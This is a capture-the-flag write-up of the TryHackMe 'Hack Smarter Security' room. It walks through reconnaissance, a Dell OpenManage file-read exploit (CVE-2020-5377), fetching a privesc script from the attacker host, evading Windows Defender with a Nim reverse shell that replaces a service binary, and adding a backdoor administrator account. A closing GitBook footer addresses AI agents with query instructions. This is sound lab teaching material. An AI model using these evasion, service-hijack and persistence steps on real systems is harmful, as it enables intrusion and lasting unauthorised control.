OpenManage™

> For the complete documentation index, see [llms.txt](https://bunring.gitbook.io/ctf-writeups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://bunring.gitbook.io/ctf-writeups/try-hack-me/2024/hack-smarter-security.md). # Hack Smarter Security {% embed url="" %} ## Recon Let's start with a nmap scan. {% code overflow="wrap" %} ``` ┌──(kali㉿kali)-[~] └─$ nmap -p- hacksmarter.thm Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-27 01:56 EDT Nmap scan report for hacksmarter.thm (10.10.72.186) Host is up (0.18s latency). Not shown: 65530 filtered tcp ports (no-response) PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 80/tcp open http 1311/tcp open rxmon 3389/tcp open ms-wbt-server Nmap done: 1 IP address (1 host up) scanned in 323.05 seconds ``` {% endcode %} {% code overflow="wrap" %} ``` ┌──(kali㉿kali)-[~] └─$ nmap -sC -sV -p 21,22,80,1311,3389 -T4 hacksmarter.thm Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-27 02:04 EDT Nmap scan report for hacksmarter.thm (10.10.72.186) Host is up (0.17s latency). PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-syst: |_ SYST: Windows_NT | ftp-anon: Anonymous FTP login allowed (FTP code 230) | 06-28-23 02:58PM 3722 Credit-Cards-We-Pwned.txt |_06-28-23 03:00PM 1022126 stolen-passport.png 22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0) | ssh-hostkey: | 2048 0d:fa:da:de:c9:dd:99:8d:2e:8e:eb:3b:93:ff:e2:6c (RSA) | 256 5d:0c:df:32:26:d3:71:a2:8e:6e:9a:1c:43:fc:1a:03 (ECDSA) |_ 256 c4:25:e7:09:d6:c9:d9:86:5f:6e:8a:8b:ec:13:4a:8b (ED25519) 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-title: HackSmarterSec |_http-server-header: Microsoft-IIS/10.0 1311/tcp open ssl/rxmon? | fingerprint-strings: | GetRequest: | HTTP/1.1 200 | Strict-Transport-Security: max-age=0 | X-Frame-Options: SAMEORIGIN | X-Content-Type-Options: nosniff | X-XSS-Protection: 1; mode=block | vary: accept-encoding | Content-Type: text/html;charset=UTF-8 | Date: Wed, 27 Mar 2024 06:04:23 GMT | Connection: close | | | | | OpenManage™ | | | \r\n\x20"); Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: -1s, deviation: 0s, median: -1s Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 49.52 seconds ``` {% endcode %} We can see anonymous login via FTP is possible. Let's do that.

┌──(kali㉿kali)-[~]
└─$ ftp 10.10.72.186
Connected to 10.10.72.186.
220 Microsoft FTP Service
Name (10.10.72.186:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||49735|)
150 Opening ASCII mode data connection.
06-28-23  02:58PM                 3722 Credit-Cards-We-Pwned.txt
06-28-23  03:00PM              1022126 stolen-passport.png
226 Transfer complete.
ftp> wget Credit-Cards-We-Pwned.txt
?Invalid command.
ftp> get Credit-Cards-We-Pwned.txt
local: Credit-Cards-We-Pwned.txt remote: Credit-Cards-We-Pwned.txt
229 Entering Extended Passive Mode (|||49737|)
125 Data connection already open; Transfer starting.
100% |********************************|  3722       25.81 KiB/s    00:00 ETA
226 Transfer complete.
3722 bytes received in 00:00 (23.95 KiB/s)
ftp> binary
200 Type set to I.
ftp> get stolen-passport.png
local: stolen-passport.png remote: stolen-passport.png
229 Entering Extended Passive Mode (|||49751|)
125 Data connection already open; Transfer starting.
100% |*********************************|   998 KiB  179.06 KiB/s    00:00 ETA
226 Transfer complete.
1022126 bytes received in 00:05 (170.36 KiB/s)
ftp> exit

To download the `.PNG` we have to switch to binary mode. `Credit-Cards-We-Pwned.txt` shows a list of credt card details.

Gobuster revealed a directory called images but we can't access it.

We continue with the web service on port 1311. Unfortunately, the Gobuster scan on this endpoint did not reveal anything. When visiting the page we get the hint that TSL is required.

We switch to `https://hacksmartersec:1311/`, and we get redirected to `https://hacksmaertersec:1311/OMSALogin?msgStatus=null`. We are dealing with `DELL EMC OPENMANAGE` and have a login page, but let's take a look around first.

The about page reveals more details including the version running. `9.4.0.2`

## Initial Access As already mentioned, we have it to deal with `DELL EMC OPENMANAGE` in version `9.4.0.2`. `CVE-2020-5377` is known for this version, which is explained in detail in the following articles. {% embed url="" %} {% embed url="" %} The blog discusses vulnerabilities found in Dell OpenManage Server Administrator (OMSA) during an internal penetration test, including `CVE-2020-5377` and `CVE-2021-21514`. It details an authentication bypass and file read vulnerability in OMSA versions `9.4.0.0` and `9.4.0.2`. The authentication bypass was deemed intended functionality. The file read vulnerability allows arbitrary file access. A security filter meant to address this was bypassed. A proof of concept for exploiting these vulnerabilities was provided. The blog concludes with recommendations to secure OMSA usage. PoCs can also be found via Searchsploit / `exploit-db.com`. However, these do not work in this case, because that version does not include the security filter bypass of `CVE-2021-21514`. The article links to the PoC of the company, which is also referenced at `exploit-db`. We will use this to retrieve data from the system: {% @github-files/github-code-block url="" %} We have file read permissions. ``` ┌──(kali㉿kali)-[~/Desktop/THM/HackSmarterSec] └─$ python3 CVE-2020-5377.py 10.17.15.155 10.10.72.186:1311 Session: B5B7564089D15D80F946B47850C18DA4 VID: CD41F7522B9B6D42 file > /windows/system32/drivers/etc/hosts Reading contents of /windows/system32/drivers/etc/hosts: # Copyright (c) 1993-2009 Microsoft Corp. # # This is a sample HOSTS file used by Microsoft TCP/IP for Windows. # # This file contains the mappings of IP addresses to host names. Each # entry should be kept on an individual line. The IP address should # be placed in the first column followed by the corresponding host name. # The IP address and the host name should be separated by at least one # space. # # Additionally, comments (such as these) may be inserted on individual # lines or following the machine name denoted by a '#' symbol. # # For example: # # 102.54.94.97 rhino.acme.com # source server # 38.25.63.10 x.acme.com # x client host # localhost name resolution is handled within DNS itself. # 127.0.0.1 localhost # ::1 localhost file > ``` We have a username and password.

We can SSH using the above credentials.

This gives us the first flag.

## Privilege Escalation The system is protected by Windows Defender, attempts with WinPEAS were recognized and removed from the system. But the script `PrivescCheck`, which does something similar to WinPEAS, was not recognized. ``` curl http://10.17.15.155/Pcheck.ps1 -o p.ps1 ``` ``` . .\p.ps1; Invoke-PrivescCheck -Extended ```

We find a vulnerability, rated as `high`. The `spoofer-scheduler` service can be started and stopped by a normal user. The service runs under the `LocalSystem`. We should be able to replace the executable of the service, e.g. with a reverse shell or an executable that creates an admin account for us, we can escalate our privileges. We confirm that we can write to `C:\Program Files(x86)\Spoofer`. We need a reverse shell executable that is not recognized by Windows Defender. Msfvenom payload gets easily detected and deleted.

We need a reverse shell executable that will not be detected by Windows Defender. A reverse shell written in Nim can be used for this. {% embed url="" %} To install Nim and mingw-w64 run the following: ``` sudo apt install mingw-w64 sudo apt install nim ``` After we make the necessary changes to host and port we need to compile it. ``` ┌──(kali㉿kali)-[~/Desktop/THM/HackSmarterSec] └─$ nim c -d:mingw --app:gui --opt:speed -o:spoofer-scheduler.exe rev_shell.nim ```

Once compiled we can start a python server and transfer the file. We first make a backup just to be safe {% code overflow="wrap" %} ``` PS C:\Program Files (x86)\Spoofer> mv .\spoofer-scheduler.exe spoofer-scheduler-backup.exe PS C:\Program Files (x86)\Spoofer> dir Directory: C:\Program Files (x86)\Spoofer Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 7/24/2020 9:31 PM 16772 CHANGES.txt -a---- 3/27/2024 8:31 AM 16 hello.txt -a---- 7/24/2020 9:31 PM 82272 LICENSE.txt -a---- 7/24/2020 9:31 PM 3097 README.txt -a---- 7/24/2020 9:31 PM 48776 restore.exe -a---- 6/30/2023 6:57 PM 152 shortcuts.ini -a---- 7/24/2020 9:31 PM 4315064 spoofer-cli.exe -a---- 7/24/2020 9:31 PM 16171448 spoofer-gui.exe -a---- 7/24/2020 9:31 PM 4064696 spoofer-prober.exe -a---- 3/27/2024 8:39 AM 526762 spoofer-scheduler.exe -a---- 7/24/2020 9:31 PM 667 THANKS.txt -a---- 7/24/2020 9:31 PM 217416 uninstall.exe ``` {% endcode %} Next, we stop the service, replace the `spoofer-scheduler.exe` with ours.

{% hint style="info" %} The shell you get is very unstable and will frequently time out as shown below. We can either set up persistence or be very quick and obtain what's needed. {% endhint %}

Our reverse shell connects, we are the `NT/ Authority System` user and have access to `C:\Users\Administrator`. As the challenge says, the next targets of the threat actor are on the `administrator's desktop`: > Once you gain access to their server, navigate through their intricate network infrastructure, bypassing firewalls, encryption protocols, and other security layers. Locate the central repository where they store sensitive information, including their upcoming target list. Intel has reported this is located on the desktop of the Administrator user. Let's set up persistence so we can log back in easily even if we loose our reverse shell ``` ┌──(kali㉿kali)-[~/Desktop/THM/HackSmarterSec] └─$ nc -lvnp 80 listening on [any] 80 ... connect to [10.17.15.155] from (UNKNOWN) [10.10.72.186] 50110 C:\Windows\system32> net user bun Hacksmarter123 /add The command completed successfully. C:\Windows\system32> net localgroup administrators bun /add The command completed successfully. ``` We can now SSH with the above credentials and find the targets for the last task of the challenge.

--- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://bunring.gitbook.io/ctf-writeups/try-hack-me/2024/hack-smarter-security.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.